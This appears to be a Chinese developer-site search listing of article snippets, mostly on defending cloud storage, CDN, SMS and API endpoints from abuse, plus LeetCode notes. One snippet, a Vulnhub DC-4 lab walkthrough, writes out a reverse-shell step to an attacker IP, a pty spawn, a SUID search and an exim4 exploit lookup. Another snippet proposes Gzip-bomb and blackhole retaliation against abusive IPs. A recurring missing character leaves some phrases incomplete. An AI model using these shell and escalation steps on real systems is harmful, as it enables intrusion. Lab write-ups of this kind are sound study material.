首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • EdgeOne 防盗实践教程

    利用 EdgeOne 的流量分析和日志分析功能,识别和定位盗攻击。4. 针对中小网站平台和企业级业务平台分别给出的 EdgeOne 防盗实践教程配置建议。 选择日期为疑似遭受盗攻击的时间段。4. 在 L7 访问流量页面,下拉查看以下维度的排行:Hosts:客户端请求的子域名。URLs:客户端请求的具体资源路径。 若被页面实际不会被其他站点引用但出现 Referer,可判定为异常。可通过配置 Referer 防盗链 阻断。 下面从个人站点运营者和线上业务站点的不同视角,给出具体的 EdgeOne 防盗实践教程。 EdgeOne 防盗链实践教程除了针对盗本身的直接防护措施外,网站还应重视对资源本身的保护,采取主动防御。防盗链是避免网站资源被未授权使用的重要手段。

    1.5K10编辑于 2024-08-27
  • 来自专栏用户5909132的专栏

    对象存储COS-防盗指引

    防护 盗有很多防护方式,这里将按配置难易度和门槛来区分,开发者可根据实际情况和需求来选择。 如需了解更多防盗链的使用技巧,可参考防盗链实践【https://cloud.tencent.com/document/product/436/6226】。 3 、配置云监控告警 配置日志管理能帮助定位和分析盗的来源,提供了丰富的字段可查询,但缺点是需要开发者主动去关注日志。如需更加及时的发现盗问题,可以配置云监控告警。 4 、开启日志管理 前面讲防盗链黑名单的时候提到过“如发现有恶意访问域名或IP”,这里就需要我们开启存储桶的日志管理,访问日志里会记录每一次请求的各种字段,帮助我们快速定位到访问来源。 referer:即防盗链设置里用于判断的条件,如发现不认识的referer,可能是被其他网站盗链,可配置防盗链-黑名单限制该referer访问,可参考1.2 开启存储桶防盗链。

    2.7K30编辑于 2023-09-22
  • 来自专栏腾讯云存储专家服务

    COS&CDN防盗方案

    方案概述针对上面的常见盗场景,防盗方案将从以下两个方面作为切入点,整体方案如下图请求型:使用攻击者的唯一特征来拒绝访问流量型:累计达到一定量级后熔断服务图片3. 3.2 防盗方案细节3.2.1 对象存储COS 防盗方案从上述盗案例来看,是属于典型的流量型,在对象存储产品这里,我们的应对措施有将存储桶改为私有读写,并且将存储桶域名接入内容分发与网络(需在CDN 图片图片配置存储桶防盗链,勾选拒绝空referer图片IP黑名单限制通过存储桶Policy策略功能,可以对匿名请求方的 IP 来配置访问控制策略,此方法可以十分有效的阻拦恶意 IP 请求,以达到防盗、 IP 请求,以达到防盗、防攻击的效益。 图片单IP 访问限频配置通过对匿名请求方的 IP 来配置访问控制策略,此方法可以十分有效的阻拦恶意 IP 的大量请求,以达到防盗、防攻击的效益。

    18.3K1711编辑于 2023-04-12
  • 来自专栏Java知识图谱

    短信接口防盗解决方案

    通过正则表达式判断手机号连号过多,容易滋生短信盗。 本文将重点聚焦接口的防盗实践。 二、盗流量 在解决防盗之前先认识盗流量的特点和防盗的目标。 (一)防盗的目标 1、减少盗的总量 如果能将盗的频率控制在60秒之外,那么单日盗的最大数量为24*60=1440。 仅靠短信运营商提供的限流和预警方案不能满足短信防盗的需求,尽管可以针对单个手机号定制发送短信限额,按小时、按天可定制发送总额,依然不满足短信防盗的目标。 短信验证码尽管能够有效保护短信接口防盗,但是不能够保护自己被盗。 (一)防盗建议 对于重要接口的防盗,除了使用上述方案外,建议遵循如下要点: 1、使用POST请求 尽量使用POST请求方式,增加盗者的尝试成本。

    10.3K31编辑于 2022-04-12
  • 来自专栏码农那些事!!!

    一个依赖搞定 Spring Boot 接口防盗

    命中规则后 命中爬虫和防盗规则后,会阻断请求,并生成接除阻断的验证码,验证码有多种组合方式,如果客户端可以正确输入验证码,则可以继续访问 验证码有中文、英文字母+数字、简单算术三种形式,每种形式又有静态图片和

    84530编辑于 2023-05-01
  • 来自专栏终码一生

    一个依赖搞定 Spring Boot 接口防盗

    3 命中规则后 命中爬虫和防盗规则后,会阻断请求,并生成接除阻断的验证码,验证码有多种组合方式,如果客户端可以正确输入验证码,则可以继续访问 验证码有中文、英文字母+数字、简单算术三种形式,每种形式又有静态图片和 4 接入使用 后端接入非常简单,只需要引用 kk-anti-reptile 的 maven 依赖,并配置启用 kk-anti-reptile 即可加入 maven 依赖 <dependency>

    85220编辑于 2022-09-08
  • 设置防盗规则与针对盗IP进行Gzip炸弹或黑洞反击

    前段时间出现了大规模的CDN盗,我也没能逃过被了200G。 今天来复盘一下被过程,以及应对方法。 现象与分析 本次盗有三个特征,特定的IP、特定的路径和短时间大量请求。 如何设置拦截 根据第一节的分析可以得出拦截的对策如下: 设置用量封顶,避免出现像我那样分两天被了200G才发现。 单IP频次限制,设置合适的频次限制,筛选出盗IP并冻结。 还有当盗者因为盗被封禁时,也会连累同IP下其他用户使其无法访问。 换到3就不同了,它会根据请求分析是否属于盗,并把盗的请求拦截下来。 通过这个功能,可以把盗者重定向到搭建好的Gzip炸弹路径。 采集盗IP并将其拉入黑洞 EddgeOne可以通过设置实时日志,将防护日志发往指定接收API 在日志中,会包含客户端来源IP的字段 在API端筛选出盗IP,再自动调用某些妙妙工具,即可将盗IP拉入黑洞

    1.1K40编辑于 2024-09-10
  • 最佳实践 | 多场景下的EdgeOne防盗实践指南

    下面从个人站点运营者和线上业务站点的不同视角,给出具体的 EdgeOne 防盗实践教程。 EdgeOne防盗链实践教程 除了针对盗本身的直接防护措施外,网站还应重视对资源本身的保护,采取主动防御。防盗链是避免网站资源被未授权使用的重要手段。 因此积极采取防盗链措施十分必要。 EdgeOne 提供了完善的防盗链解决方案,可从 Referer 防盗链、Token 防盗链、远程鉴权等多个角度对盗链行为进行管控,保护您的内容免受未经授权的盗链访问,提升加速服务的安全性。 更多详情,可参考EdgeOne防盗链实践教程(https://cloud.tencent.com/document/product/1552/108736)。

    2.4K10编辑于 2024-12-05
  • 一种优雅的方式整合限流、幂等、防盗

    大家在工作中肯定遇到过接口被人狂的经历,就算没有经历过,在接口开发的过程中,我们也需要对那些容易被的接口或者和会消耗公司金钱相关的接口增加防盗功能。 而且如果获取到的公钥不能存在时效性,可以被多次使用,那么这些通过加密实现防盗的接口,在公钥被泄露的情况下,还是会存在被盗的问题。 上面便是我实现接口防盗的具体过程,现在我们来验证一下,这个防盗是否真的能防(还是以发送短信验证码)? 其他措施还有其他的措施,也可以增加接口被盗的情况。这些措施包括增加防盗逻辑被破解难度和防止接口被盗。先说防止接口被盗,本质上是防止接口被泄露。 这两个操作可以增加我们接口被暴露的风险,从而在一定程度上起到"防盗"目的。

    93010编辑于 2024-09-01
  • 来自专栏全栈程序员必看

    qq怎样防盗 qq密码如何防盗

    4. 不要随意运行别人发给你的文件,即便那些看起来很诱人的文件也不要轻易地去运行它,往往这样的文件后面都隐藏着不可告人的秘密和危险。 5.

    5.8K20编辑于 2022-09-09
  • 来自专栏某菜鸟の小屋

    『LeetCode』#4题日记

    前言 本日记为个人的题学习日记,内容非原创,仅为自己复习知识时,能够看得懂自己写的CV的代码,快速理解题意。另外,力扣官方的题解很好用,三叶姐nb!!!!! 15. 例如,"346" 会替换为 "13" ,因为 3 + 4 + 6 = 13 。 合并 所有组以形成一个新字符串。如果新字符串的长度大于 k 则重复第一步。 返回在完成所有轮操作后的 s 。 3 == 0) { ans += val / 3; } else { // 不能被三整除的情况 比如 4 Sites.put(1, "Google"); Sites.put(2, "Runoob"); Sites.put(3, "Taobao"); Sites.put(4,

    57110编辑于 2022-11-01
  • 来自专栏KI的算法杂记

    LeetCode题系列(4)

    rec.erase(nums[i - k]); //滑动窗口 } } return false; } }; 4.

    40710编辑于 2022-09-19
  • 来自专栏C3ting

    Vulnhnb题-DC-4

    Vulnhnb题-DC-4 下载后,导入VMware打开,设置网络连接为NAT,拍摄一个快照防止环境损坏,即可开始攻击。 eth0 192.168.119.0/24 //扫描本地网络中存活主机 IP信息: 攻击机:192.168.119.128 靶机:192.168.119.153 靶机端口情况: nmap -sV -T4 sh 192.168.119.128 8888即可反弹shell 修改本地shell为交互式 python -c 'import pty;pty.spawn("/bin/bash")' 寻找提权点: 4、 用户: 寻找 flag文件 攻下: 方法3: 查询我们的本地shell有什么权限: find / -user root -perm -4000 -print 2>/dev/null 发现常见的exim4 ,看看可以使用这个漏洞不,先查看一下版本信息:exim4 --version 搜索看看有啥可用的漏洞信息:searchsploit exim 4 发现只有满足版本要求,传上去看看。

    43310编辑于 2023-12-26
  • 来自专栏Laoqi's Linux运维专列

    配置防盗

    配置防盗链 : 防止别人盗取引用自己的内部资源链接! 来路IP或站点 配置防盗链: <VirtualHost *:80> DocumentRoot "/data/wwwroot/haha.com" ServerName www.haha.com (txt|doc|mp3|zip|rar|jpg|gif)"> //匹配资源做防盗链。 GMT Server: Apache/2.4.27 (Unix) PHP/5.6.30 Last-Modified: Wed, 07 Jun 2017 09:38:32 GMT ETag: "97d4-

    2.6K50发布于 2018-05-09
  • 来自专栏小杰的学习本

    菜鸟题Day4

    ⭐作者:别动我的饭 ⭐专栏:菜鸟题 ⭐标语:悟已往之不谏,知来者之可追 一.阶乘尾数:面试题 16.05. =1 * 2 * 3 * 4 * 5……* 10……* 15……* 20; 这个式子中出现了5,10=2 * 5,15=3 * 5,20=4 * 5; 即出现了4个5,而20的阶乘为243290200817664 0000;尾数零刚好是4个 找5的个数,也就是将n循环除5直到小于5为止 int trailingZeroes(int n) { int count=0; while(

    72900编辑于 2023-03-28
  • 来自专栏布衣者博客

    LeetCode-题库-题(4)

    4. 寻找两个正序数组的中位数 给定两个大小分别为 m 和 n 的正序(从小到大)数组 nums1 和 nums2。请你找出并返回这两个正序数组的 中位数 。

    47110发布于 2021-09-07
  • 来自专栏Python数据结构与算法

    牛客网题-(4)

    #将最大值输出 print("%d eh o maior"%X) 这道题的难点:题目给了你两个数如何取得最大值,但是现在求三个数,我们可以先比较前两个再比较第一次取到的最大值和未比较值的大小 (4)

    25910编辑于 2024-01-18
  • 来自专栏雨过天晴

    极路由4OpenWrt(LEDE)

    申请开发者模式 登录路由器后台 进入插件中间 选中路由器信息 申请开发者权限 安装开发者插件 Bootloader 下载 极路由4 的 Breed 通过SSH登录路由器 (必须安装开发者插件,端口 root 密码 路由器密码) 通过工具上传到 /tmp 目录 scp -P 1022 breed-mt7621-hiwifi-hc5962.bin root@192.168.199.1:/tmp 执行机操作 昨天未来得及截图,图片来自网络,非 极路由4 固件 极路由4 的 OpenWrt 介绍页面 下载 OpenWrt 的固件 下载链接, 也可通过介绍页面中得 Firmware OpenWrt Install

    12.2K20发布于 2019-03-12
  • 来自专栏h-t-m

    LeetCode 题笔记——day 4

    LeetCode 题笔记——day 4 5. 最长回文子串 难度:中等 给你一个字符串 s,找到 s 中最长的回文子串。 示例 2: 输入:s = "cbbd" 输出:"bb" 示例 3: 输入:s = "a" 输出:"a" 示例 4: 输入:s = "ac" 输出:"a" 提示: 1 <= s.length <= 1000 就做题思想来说,作为小白,要学习的真的太多了,希望对算法的学习能成功从题开始一直深入。如果有小白也到这里,应该也会感到很无力吧,愿大家都能坚持到底。

    40120编辑于 2022-11-24
  • 来自专栏Tom

    防盗

    直接访问地址可以成功访问到图片 但是这又好像是个重定向 因为状态码是304 我我我真是百思不得其姐 然后就是一顿asking debug 问了很多群里的大佬们 和各位javaer们 最后得出的结论是 这是一个防盗链 那什么是防盗链呢 这里引用这位老师的; 网站资源都有域的概念,浏览器加载一个站点时,首先加载这个站点的首页,一般是index.html或者index.php等。 一般的站点或者静态资源托管站点都提供防盗链的设置,也就是让服务端识别指定的Referer,在服务端接收到请求时,通过匹配referer头域与配置,对于指定放行,对于其他referer视为盗链。

    2.3K20编辑于 2022-04-15
领券